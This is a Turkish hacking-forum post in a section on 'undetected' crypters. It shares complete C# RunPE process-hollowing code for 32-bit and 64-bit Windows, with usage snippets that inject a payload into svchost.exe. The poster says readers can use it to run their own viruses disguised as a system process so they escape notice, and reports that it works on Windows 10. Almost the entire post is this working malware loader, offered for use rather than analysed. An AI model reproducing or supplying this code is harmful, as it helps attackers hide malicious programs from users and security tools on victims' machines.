Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Undetected

Undetected Crypter, HEX kodlama ile ilgili konular



[C#] RunPE x86 / x64

Undetected

Yeni Konu aç Cevapla
 
Seçenekler
Alt 03-12-2018 18:16   #1
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
08/2011
Nereden
BakÜ
Mesajlar
Konular

Teşekkür (Etti): 63
Teşekkür (Aldı): 58


Thumbs up [C#] RunPE x86 / x64



Azerbaycandan selamlar arkadaşlar!
Sizlere verdiyim bu iki kodla kendi virüslerinizi RunPE yapa bilirsiniz.

RunPE nedir?
Energizer01: herhangi tür virüsün sistem dosyası adı altında çalışmasıdır,örneğin görev yöneticisini açtığında svchost.exe yazar, sistem dosyası diye ellemezsin ,yeterli güvenlik önlemi yoksa orda gizlice çalışır, bir nevi virüsü kamuflajlama diyebiliriz...

x86 kod:

Kod:
using System;
using System.ComponentModel;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
namespace HackForums.gigajew
{
    /// <summary>
    /// This RunPE was created by gigajew @ www.hackforums.net for Windows 10
    /// Please leave these credits as a reminder of all the hours of work put into this
    /// </summary>
    public class WinXParameters
    {
        public byte[] Payload;
        public string HostFileName;
        public string[] Arguments;
        public bool Hidden;
        public static WinXParameters Create(byte[] payload, string hostFileName, bool hidden, params string[] arguments)
        {
            WinXParameters parameters = new WinXParameters();
            parameters.HostFileName = hostFileName;
            parameters.Payload = payload;
            parameters.Arguments = arguments;
            parameters.Hidden = hidden;
            return parameters;
        }
        public string GetFormattedHostFileName()
        {
            if (Arguments != null)
            {
                if (Arguments.Length > 0)
                {
                    return string.Format("{0} {1}", HostFileName, string.Join(" ", Arguments));
                }
            }
            return HostFileName;
        }
    }
    /// <summary>
    /// This RunPE was created by gigajew @ www.hackforums.net for Windows 10
    /// Please leave these credits as a reminder of all the hours of work put into this
    /// </summary>
    public static unsafe class WinXRunPE
    {
        public static bool Inject(WinXParameters parameters)
        {
            _IMAGE_DOS_HEADER* dosHeader;
            _IMAGE_NT_HEADERS* ntHeaders;
            IntPtr pImageBase;
            IntPtr pBuffer;
            bool emulatedi386 = false;
            string currentDir = Path.GetDirectoryName(Assembly.GetEntryAssembly().********);
            ProcessInfo processInfo;
            processInfo = new ProcessInfo();
            _CONTEXT context = new _CONTEXT();
            context.ContextFlags = 0x10001b;
            // get the address of buffer
            fixed (byte* pBufferUnsafe = parameters.Payload)
            {
                pBuffer = (IntPtr)pBufferUnsafe;
                dosHeader = (_IMAGE_DOS_HEADER*)(pBufferUnsafe);
                ntHeaders = (_IMAGE_NT_HEADERS*)(pBufferUnsafe + (dosHeader->e_lfanew));
            }
            // security checks
            if (dosHeader->e_magic != 0x5A4D || ntHeaders->Signature != 0x00004550)
            {
                throw new Win32Exception("Not a valid Win32 PE! -gigajew");
            }
            // check 32-bit
            if (ntHeaders->OptionalHeader.Magic != 0x10b)
            {
                throw new Exception("This RunPE only supports i386-built executables! -gigajew");
            }
            // patch (by Menalix/gigajew)
            Buffer.SetByte(parameters.Payload, 0x398, 0x2);
            // init
            if (!CreateProcess(null, parameters.GetFormattedHostFileName(), IntPtr.Zero, IntPtr.Zero, false, parameters.Hidden ? 0x00000004u | 0x08000000u : 0x00000004u, IntPtr.Zero, currentDir, new byte[0], &processInfo))
            {
                if (processInfo.hProcess != IntPtr.Zero)
                {
                    if (!TerminateProcess(processInfo.hProcess, -1))
                    {
                        throw new Win32Exception(Marshal.GetLastWin32Error());
                    }
                    else
                    {
                        CloseHandle(processInfo.hProcess);
                        CloseHandle(processInfo.hThread);
                    }
                }
                return false;
            }
            // check emulated i386
            IsWow64Process(processInfo.hProcess, ref emulatedi386);
            // unmap
            pImageBase = (IntPtr)(ntHeaders->OptionalHeader.ImageBase);
            NtUnmapViewOfSection(processInfo.hProcess, pImageBase); // we don't care if this fails
            // allocate
            if (VirtualAllocEx(processInfo.hProcess, pImageBase, ntHeaders->OptionalHeader.SizeOfImage, 0x3000u, 0x40u) == IntPtr.Zero)
            {
                if (!TerminateProcess(processInfo.hProcess, -1))
                {
                    throw new Win32Exception(Marshal.GetLastWin32Error());
                }
                else
                {
                    CloseHandle(processInfo.hProcess);
                    CloseHandle(processInfo.hThread);
                    return false;
                }
            }
            // copy image headers
            if (!WriteProcessMemory(processInfo.hProcess, pImageBase, pBuffer, ntHeaders->OptionalHeader.SizeOfHeaders, IntPtr.Zero))
            {
                if (!TerminateProcess(processInfo.hProcess, -1))
                {
                    throw new Win32Exception(Marshal.GetLastWin32Error());
                }
                else
                {
                    CloseHandle(processInfo.hProcess);
                    CloseHandle(processInfo.hThread);
                    return false;
                }
            }
            // copy sections
            for (ushort i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++)
            {
                _IMAGE_SECTION_HEADER* section = (_IMAGE_SECTION_HEADER*)(pBuffer.ToInt64() + (dosHeader->e_lfanew) + Marshal.SizeOf(typeof(_IMAGE_NT_HEADERS)) + (Marshal.SizeOf(typeof(_IMAGE_SECTION_HEADER)) * i));
                if (!WriteProcessMemory(processInfo.hProcess, (IntPtr)(pImageBase.ToInt64() + (section->VirtualAddress)), (IntPtr)(pBuffer.ToInt64() + (section->PointerToRawData)), section->SizeOfRawData, IntPtr.Zero))
                {
                    if (!TerminateProcess(processInfo.hProcess, -1))
                    {
                        throw new Win32Exception(Marshal.GetLastWin32Error());
                    }
                    else
                    {
                        CloseHandle(processInfo.hProcess);
                        CloseHandle(processInfo.hThread);
                        return false;
                    }
                }
            }
            // get thread context
            if (emulatedi386)
            {
                if (!Wow64GetThreadContext(processInfo.hThread, &context))
                {
                    if (!TerminateProcess(processInfo.hProcess, -1))
                    {
                        throw new Win32Exception(Marshal.GetLastWin32Error());
                    }
                    else
                    {
                        CloseHandle(processInfo.hProcess);
                        CloseHandle(processInfo.hThread);
                        return false;
                    }
                }
            }
            else
            {
                if (!GetThreadContext(processInfo.hThread, &context))
                {
                    if (!TerminateProcess(processInfo.hProcess, -1))
                    {
                        throw new Win32Exception(Marshal.GetLastWin32Error());
                    }
                    else
                    {
                        CloseHandle(processInfo.hProcess);
                        CloseHandle(processInfo.hThread);
                        return false;
                    }
                }
            }
            // patch imagebase
            IntPtr address = Marshal.AllocHGlobal(8);
            ulong puImageBase = (ulong)pImageBase.ToInt64();
            byte[] pbImageBase = new byte[8];
            pbImageBase[0] = (byte)(puImageBase >> 0);
            pbImageBase[1] = (byte)(puImageBase >> 8);
            pbImageBase[2] = (byte)(puImageBase >> 16);
            pbImageBase[3] = (byte)(puImageBase >> 24);
            pbImageBase[4] = (byte)(puImageBase >> 32);
            pbImageBase[5] = (byte)(puImageBase >> 40);
            pbImageBase[6] = (byte)(puImageBase >> 48);
            pbImageBase[7] = (byte)(puImageBase >> 56);
            Marshal.Copy(pbImageBase, 0, address, 8);
            if (!WriteProcessMemory(processInfo.hProcess, (IntPtr)(context.Ebx + 8ul), address, 4u, IntPtr.Zero))
            {
                Marshal.FreeHGlobal(address);
                if (!TerminateProcess(processInfo.hProcess, -1))
                {
                    throw new Win32Exception(Marshal.GetLastWin32Error());
                }
                else
                {
                    CloseHandle(processInfo.hProcess);
                    CloseHandle(processInfo.hThread);
                    return false;
                }
            }
            Marshal.FreeHGlobal(address);
            // patch ep
            context.Eax = (uint)(pImageBase.ToInt64() + (ntHeaders->OptionalHeader.AddressOfEntryPoint));
            // set context
            if (emulatedi386)
            {
                if (!Wow64SetThreadContext(processInfo.hThread, &context))
                {
                    if (!TerminateProcess(processInfo.hProcess, -1))
                    {
                        throw new Win32Exception(Marshal.GetLastWin32Error());
                    }
                    else
                    {
                        CloseHandle(processInfo.hProcess);
                        CloseHandle(processInfo.hThread);
                        return false;
                    }
                }
            }
            else
            {
                if (!SetThreadContext(processInfo.hThread, &context))
                {
                    if (!TerminateProcess(processInfo.hProcess, -1))
                    {
                        throw new Win32Exception(Marshal.GetLastWin32Error());
                    }
                    else
                    {
                        CloseHandle(processInfo.hProcess);
                        CloseHandle(processInfo.hThread);
                        return false;
                    }
                }
            }
            // resume thread
            ResumeThread(processInfo.hThread);
            // cleanup
            CloseHandle(processInfo.hProcess);
            CloseHandle(processInfo.hThread);
            return true;
        }
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool CreateProcess([MarshalAs(UnmanagedType.LPTStr)]string lpApplicationName,
                                         [MarshalAs(UnmanagedType.LPTStr)]string lpCommandLine,
                                         [MarshalAs(UnmanagedType.SysInt)]IntPtr lpProcessAttributes,
                                         [MarshalAs(UnmanagedType.SysInt)]IntPtr lpThreadAttributes,
                                         [MarshalAs(UnmanagedType.Bool)]bool bInheritHandles,
                                         [MarshalAs(UnmanagedType.U4)]uint dwCreationFlags,
                                         [MarshalAs(UnmanagedType.SysInt)]IntPtr lpEnvironment,
                                         [MarshalAs(UnmanagedType.LPTStr)]string lpCurrentDirectory,
                                         byte[] lpStartupInfo,
                                         ProcessInfo* lpProcessInfo);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool TerminateProcess([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess, [MarshalAs(UnmanagedType.I4)]int exitCode);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool CloseHandle([MarshalAs(UnmanagedType.SysInt)]IntPtr hObject);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool Wow64GetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT* pContext);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool Wow64SetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT* pContext);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool GetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT* pContext);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool SetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT* pContext);
        [DllImport("ntdll.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.U4)]
        private static extern uint NtUnmapViewOfSection([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess, [MarshalAs(UnmanagedType.SysInt)]IntPtr lpBaseAddress);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.SysInt)]
        private static extern IntPtr VirtualAllocEx([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess,
                                                    [MarshalAs(UnmanagedType.SysInt)]IntPtr lpAddress,
                                                    [MarshalAs(UnmanagedType.U4)]uint dwSize,
                                                    [MarshalAs(UnmanagedType.U4)]uint flAl********Type,
                                                    [MarshalAs(UnmanagedType.U4)]uint flProtect);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool WriteProcessMemory([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess,
                                                        [MarshalAs(UnmanagedType.SysInt)]IntPtr lpBaseAddress,
                                                        [MarshalAs(UnmanagedType.SysInt)]IntPtr lpBuffer,
                                                        [MarshalAs(UnmanagedType.U4)]uint nSize,
                                                        [MarshalAs(UnmanagedType.SysInt)]IntPtr lpNumberOfBytesWritten);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.U4)]
        private static extern uint ResumeThread([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool IsWow64Process([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess, [MarshalAs(UnmanagedType.Bool)]ref bool isWow64);
    }
    [StructLayout(LayoutKind.Sequential)]
    public struct ProcessInfo
    {
        public IntPtr hProcess;
        public IntPtr hThread;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0x28)]
    public struct _IMAGE_SECTION_HEADER
    {
        [FieldOffset(0xc)]
        public UInt32 VirtualAddress;
        [FieldOffset(0x10)]
        public UInt32 SizeOfRawData;
        [FieldOffset(0x14)]
        public UInt32 PointerToRawData;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0x14)]
    public struct _IMAGE_FILE_HEADER
    {
        [FieldOffset(0x02)]
        public ushort NumberOfSections;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0x40)]
    public struct _IMAGE_DOS_HEADER
    {
        [FieldOffset(0x00)]
        public ushort e_magic;
        [FieldOffset(0x3c)]
        public uint e_lfanew;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0xf8)]
    public struct _IMAGE_NT_HEADERS
    {
        [FieldOffset(0x00)]
        public uint Signature;
        [FieldOffset(0x04)]
        public _IMAGE_FILE_HEADER FileHeader;
        [FieldOffset(0x18)]
        public _IMAGE_OPTIONAL_HEADER OptionalHeader;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0xe0)]
    public struct _IMAGE_OPTIONAL_HEADER
    {
        [FieldOffset(0x00)]
        public ushort Magic;
        [FieldOffset(0x010)]
        public uint AddressOfEntryPoint;
        [FieldOffset(0x1c)]
        public uint ImageBase;
        [FieldOffset(0x38)]
        public uint SizeOfImage;
        [FieldOffset(0x3c)]
        public uint SizeOfHeaders;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0x2cc)]
    public struct _CONTEXT
    {
        [FieldOffset(0x00)]
        public uint ContextFlags;
        [FieldOffset(0xa4)]
        public uint Ebx;
        [FieldOffset(0xb0)]
        public uint Eax;
    }
}
kullanım kodu:

Kod:
public static int Main(string[] args)
        {
            byte[] payload = File.ReadAllBytes("putty.exe");
            string i386svchost = "C:\\Windows\\SysWow64\\svchost.exe"; //notice SysWow64 instead of System32
            string[] arguments = null;
            bool hidden = false;
            WinXParameters parameters = WinXParameters.Create(payload, i386svchost, hidden, arguments);
            bool res = WinXRunPE.Inject(parameters);
            Console.WriteLine("Executed: {0}", res.ToString());
            Console.ReadLine();
            return 0;
        }
__________________________________________________ ________________


x64 kodu:

Kod:
using System;
using System.ComponentModel;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
namespace HackForums.gigajew
{
    /// <summary>
    /// This RunPE was created by gigajew @ www.hackforums.net for Windows 10 x64
    /// Please leave these credits as a reminder of all the hours of work put into this
    /// </summary>
    public class WinXParameters
    {
        public byte[] Payload;
        public string HostFileName;
        public string[] Arguments;
        public bool Hidden;
        public static WinXParameters Create(byte[] payload, string hostFileName, bool hidden, params string[] arguments)
        {
            WinXParameters parameters = new WinXParameters();
            parameters.HostFileName = hostFileName;
            parameters.Payload = payload;
            parameters.Arguments = arguments;
            parameters.Hidden = hidden;
            return parameters;
        }
        public string GetFormattedHostFileName()
        {
            if (Arguments != null)
            {
                if (Arguments.Length > 0)
                {
                    return string.Format("{0} {1}", HostFileName, string.Join(" ", Arguments));
                }
            }
            return HostFileName;
        }
    }
    /// <summary>
    /// This RunPE was created by gigajew @ www.hackforums.net for Windows 10 x64
    /// Please leave these credits as a reminder of all the hours of work put into this
    /// </summary>
    public static unsafe class WinXRunPE_AMD64
    {
        public static bool Inject(WinXParameters parameters)
        {
            _IMAGE_DOS_HEADER* dosHeader;
            _IMAGE_NT_HEADERS64* ntHeaders;
            IntPtr pImageBase;
            IntPtr pBuffer;
            string currentDir = Path.GetDirectoryName(Assembly.GetEntryAssembly().********);
            ProcessInfo processInfo;
            processInfo = new ProcessInfo();
            _CONTEXT_AMD64 context = new _CONTEXT_AMD64();
            context.ContextFlags = 0x10001b;
            // get the address of buffer
            fixed (byte* pBufferUnsafe = parameters.Payload)
            {
                pBuffer = (IntPtr)pBufferUnsafe;
                dosHeader = (_IMAGE_DOS_HEADER*)(pBufferUnsafe);
                ntHeaders = (_IMAGE_NT_HEADERS64*)(pBufferUnsafe + (dosHeader->e_lfanew));
            }
            // security checks
            if (dosHeader->e_magic != 0x5A4D || ntHeaders->Signature != 0x00004550)
            {
                throw new Win32Exception("Not a valid Win32 PE! -gigajew");
            }
            // check 32-bit
            if (ntHeaders->OptionalHeader.Magic != 0x20b)
            {
                throw new Exception("This RunPE only supports AMD64-built executables! -gigajew");
            }
            // init
            if (!CreateProcess(null, parameters.GetFormattedHostFileName(), IntPtr.Zero, IntPtr.Zero, false, parameters.Hidden ? 0x00000004u | 0x08000000u : 0x00000004u, IntPtr.Zero, currentDir, new byte[0], &processInfo))
            {
                if (processInfo.hProcess != IntPtr.Zero)
                {
                    if (!TerminateProcess(processInfo.hProcess, -1))
                    {
                        throw new Win32Exception(Marshal.GetLastWin32Error());
                    }
                    else
                    {
                        CloseHandle(processInfo.hProcess);
                        CloseHandle(processInfo.hThread);
                    }
                }
                return false;
            }
            // unmap
            pImageBase = (IntPtr)(ntHeaders->OptionalHeader.ImageBase);
            NtUnmapViewOfSection(processInfo.hProcess, pImageBase); // we don't care if this fails
            // allocate
            if (VirtualAllocEx(processInfo.hProcess, pImageBase, ntHeaders->OptionalHeader.SizeOfImage, 0x3000u, 0x40u) == IntPtr.Zero)
            {
                if (!TerminateProcess(processInfo.hProcess, -1))
                {
                    throw new Win32Exception(Marshal.GetLastWin32Error());
                }
                else
                {
                    CloseHandle(processInfo.hProcess);
                    CloseHandle(processInfo.hThread);
                    return false;
                }
            }
            // copy image headers
            if (!WriteProcessMemory(processInfo.hProcess, pImageBase, pBuffer, ntHeaders->OptionalHeader.SizeOfHeaders, IntPtr.Zero))
            {
                if (!TerminateProcess(processInfo.hProcess, -1))
                {
                    throw new Win32Exception(Marshal.GetLastWin32Error());
                }
                else
                {
                    CloseHandle(processInfo.hProcess);
                    CloseHandle(processInfo.hThread);
                    return false;
                }
            }
            // copy sections
            for (ushort i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++)
            {
                _IMAGE_SECTION_HEADER* section = (_IMAGE_SECTION_HEADER*)(pBuffer.ToInt64() + (dosHeader->e_lfanew) + Marshal.SizeOf(typeof(_IMAGE_NT_HEADERS64)) + (Marshal.SizeOf(typeof(_IMAGE_SECTION_HEADER)) * i));
                if (!WriteProcessMemory(processInfo.hProcess, (IntPtr)(pImageBase.ToInt64() + (section->VirtualAddress)), (IntPtr)(pBuffer.ToInt64() + (section->PointerToRawData)), section->SizeOfRawData, IntPtr.Zero))
                {
                    if (!TerminateProcess(processInfo.hProcess, -1))
                    {
                        throw new Win32Exception(Marshal.GetLastWin32Error());
                    }
                    else
                    {
                        CloseHandle(processInfo.hProcess);
                        CloseHandle(processInfo.hThread);
                        return false;
                    }
                }
            }
            // get thread context
            if (!GetThreadContext(processInfo.hThread, &context))
            {
                if (!TerminateProcess(processInfo.hProcess, -1))
                {
                    throw new Win32Exception(Marshal.GetLastWin32Error());
                }
                else
                {
                    CloseHandle(processInfo.hProcess);
                    CloseHandle(processInfo.hThread);
                    return false;
                }
            }
            // patch imagebase
            IntPtr address = Marshal.AllocHGlobal(8);
            ulong puImageBase = (ulong)pImageBase.ToInt64();
            byte[] pbImageBase = new byte[8];
            pbImageBase[0] = (byte)(puImageBase >> 0);
            pbImageBase[1] = (byte)(puImageBase >> 8);
            pbImageBase[2] = (byte)(puImageBase >> 16);
            pbImageBase[3] = (byte)(puImageBase >> 24);
            pbImageBase[4] = (byte)(puImageBase >> 32);
            pbImageBase[5] = (byte)(puImageBase >> 40);
            pbImageBase[6] = (byte)(puImageBase >> 48);
            pbImageBase[7] = (byte)(puImageBase >> 56);
            Marshal.Copy(pbImageBase, 0, address, 8);
            if (!WriteProcessMemory(processInfo.hProcess, (IntPtr)(context.Rdx + 16ul), address, 8u, IntPtr.Zero))
            {
                Marshal.FreeHGlobal(address);
                if (!TerminateProcess(processInfo.hProcess, -1))
                {
                    throw new Win32Exception(Marshal.GetLastWin32Error());
                }
                else
                {
                    CloseHandle(processInfo.hProcess);
                    CloseHandle(processInfo.hThread);
                    return false;
                }
            }
            Marshal.FreeHGlobal(address);
            // patch ep
            context.Rcx = (ulong)(pImageBase.ToInt64() + (ntHeaders->OptionalHeader.AddressOfEntryPoint));
            // set context
            if (!SetThreadContext(processInfo.hThread, &context))
            {
                if (!TerminateProcess(processInfo.hProcess, -1))
                {
                    throw new Win32Exception(Marshal.GetLastWin32Error());
                }
                else
                {
                    CloseHandle(processInfo.hProcess);
                    CloseHandle(processInfo.hThread);
                    return false;
                }
            }
            // resume thread
            ResumeThread(processInfo.hThread);
            // cleanup
            CloseHandle(processInfo.hProcess);
            CloseHandle(processInfo.hThread);
            return true;
        }
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool CreateProcess([MarshalAs(UnmanagedType.LPTStr)]string lpApplicationName,
                                         [MarshalAs(UnmanagedType.LPTStr)]string lpCommandLine,
                                         [MarshalAs(UnmanagedType.SysInt)]IntPtr lpProcessAttributes,
                                         [MarshalAs(UnmanagedType.SysInt)]IntPtr lpThreadAttributes,
                                         [MarshalAs(UnmanagedType.Bool)]bool bInheritHandles,
                                         [MarshalAs(UnmanagedType.U4)]uint dwCreationFlags,
                                         [MarshalAs(UnmanagedType.SysInt)]IntPtr lpEnvironment,
                                         [MarshalAs(UnmanagedType.LPTStr)]string lpCurrentDirectory,
                                         byte[] lpStartupInfo,
                                         ProcessInfo* lpProcessInfo);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool TerminateProcess([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess, [MarshalAs(UnmanagedType.I4)]int exitCode);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool CloseHandle([MarshalAs(UnmanagedType.SysInt)]IntPtr hObject);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool Wow64GetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT_AMD64* pContext);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool Wow64SetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT_AMD64* pContext);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool GetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT_AMD64* pContext);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool SetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT_AMD64* pContext);
        [DllImport("ntdll.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.U4)]
        private static extern uint NtUnmapViewOfSection([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess, [MarshalAs(UnmanagedType.SysInt)]IntPtr lpBaseAddress);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.SysInt)]
        private static extern IntPtr VirtualAllocEx([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess,
                                                    [MarshalAs(UnmanagedType.SysInt)]IntPtr lpAddress,
                                                    [MarshalAs(UnmanagedType.U4)]uint dwSize,
                                                    [MarshalAs(UnmanagedType.U4)]uint flAl********Type,
                                                    [MarshalAs(UnmanagedType.U4)]uint flProtect);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool WriteProcessMemory([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess,
                                                        [MarshalAs(UnmanagedType.SysInt)]IntPtr lpBaseAddress,
                                                        [MarshalAs(UnmanagedType.SysInt)]IntPtr lpBuffer,
                                                        [MarshalAs(UnmanagedType.U4)]uint nSize,
                                                        [MarshalAs(UnmanagedType.SysInt)]IntPtr lpNumberOfBytesWritten);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.U4)]
        private static extern uint ResumeThread([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread);
    }
    [StructLayout(LayoutKind.Sequential)]
    public struct ProcessInfo
    {
        public IntPtr hProcess;
        public IntPtr hThread;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0x28)]
    public struct _IMAGE_SECTION_HEADER
    {
        [FieldOffset(0xc)]
        public UInt32 VirtualAddress;
        [FieldOffset(0x10)]
        public UInt32 SizeOfRawData;
        [FieldOffset(0x14)]
        public UInt32 PointerToRawData;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0x14)]
    public struct _IMAGE_FILE_HEADER
    {
        [FieldOffset(0x02)]
        public ushort NumberOfSections;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0x40)]
    public struct _IMAGE_DOS_HEADER
    {
        [FieldOffset(0x00)]
        public ushort e_magic;
        [FieldOffset(0x3c)]
        public uint e_lfanew;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0x108)]
    public struct _IMAGE_NT_HEADERS64
    {
        [FieldOffset(0x00)]
        public uint Signature;
        [FieldOffset(0x04)]
        public _IMAGE_FILE_HEADER FileHeader;
        [FieldOffset(0x18)]
        public _IMAGE_OPTIONAL_HEADER64 OptionalHeader;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0xf0)]
    public struct _IMAGE_OPTIONAL_HEADER64
    {
        [FieldOffset(0x00)]
        public ushort Magic;
        [FieldOffset(0x010)]
        public uint AddressOfEntryPoint;
        [FieldOffset(0x18)]
        public ulong ImageBase;
        [FieldOffset(0x38)]
        public uint SizeOfImage;
        [FieldOffset(0x3c)]
        public uint SizeOfHeaders;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0x4d0)]
    public struct _CONTEXT_AMD64
    {
        [FieldOffset(0x30)]
        public uint ContextFlags;
        [FieldOffset(0x80)]
        public ulong Rcx;
        [FieldOffset(0x88)]
        public ulong Rdx;
    }
}
kullanım için kod:

Kod:
public static int Main(string[] args)
        {
            byte[] payload = File.ReadAllBytes("putty.exe");
            string i386svchost = "C:\\Windows\\SysWow64\\svchost.exe"; //notice SysWow64 instead of System32
            string[] arguments = null;
            bool hidden = false;
            WinXParameters parameters = WinXParameters.Create(payload, i386svchost, hidden, arguments);
            bool res = WinXRunPE_AMD64.Inject(parameters);
            Console.WriteLine("Executed: {0}", res.ToString());
            Console.ReadLine();
            return 0;
        }
Alıntıdır! sağlıcakla kullanın. çalışıyor win 10 x86 da denedim



___________________________________________

Saygilarimla....

 Offline  
 
Alıntı ile Cevapla
Teşekkür

Plans Teşekkür etti.
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
